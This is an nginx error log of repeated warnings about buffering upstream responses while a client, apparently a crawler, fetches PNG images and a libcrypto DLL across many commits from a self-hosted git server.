2026/02/17 14:13:18 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/20/0000014201 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:13:26 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/20/0000014202 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:13:29 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/20/0000014203 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:13:46 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/20/0000014204 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:13:58 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/20/0000014205 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:14:10 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/20/0000014206 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:14:17 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/20/0000014207 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:14:24 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/20/0000014208 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:14:30 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/20/0000014209 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 14:14:37 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/21/0000014210 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:14:46 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/21/0000014211 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:14:49 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/21/0000014212 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html"
2026/02/17 14:14:49 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/21/0000014213 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html"
2026/02/17 14:14:56 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/21/0000014214 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:15:04 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/21/0000014215 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:15:07 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/21/0000014216 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:15:12 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/21/0000014217 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 14:15:20 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/21/0000014218 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:15:29 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/21/0000014219 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:15:32 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/22/0000014220 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:15:38 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/22/0000014221 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:15:40 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/22/0000014222 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html"
2026/02/17 14:15:41 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/22/0000014223 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:15:48 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/22/0000014224 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:15:55 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/22/0000014225 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:16:03 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/22/0000014226 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:16:07 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/22/0000014227 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:16:12 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/22/0000014228 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:16:19 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/22/0000014229 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:16:27 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/23/0000014230 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:16:36 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/23/0000014231 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:16:49 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/23/0000014232 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:16:57 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/23/0000014233 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 14:17:03 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/23/0000014234 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 14:18:23 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/23/0000014235 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll"
2026/02/17 14:18:37 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/23/0000014236 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll"
2026/02/17 14:19:05 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/23/0000014237 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll"
2026/02/17 14:19:08 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/23/0000014238 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll"
2026/02/17 14:19:19 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/23/0000014239 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll"
2026/02/17 14:19:33 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/24/0000014240 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll"
2026/02/17 14:20:56 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/24/0000014241 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png"
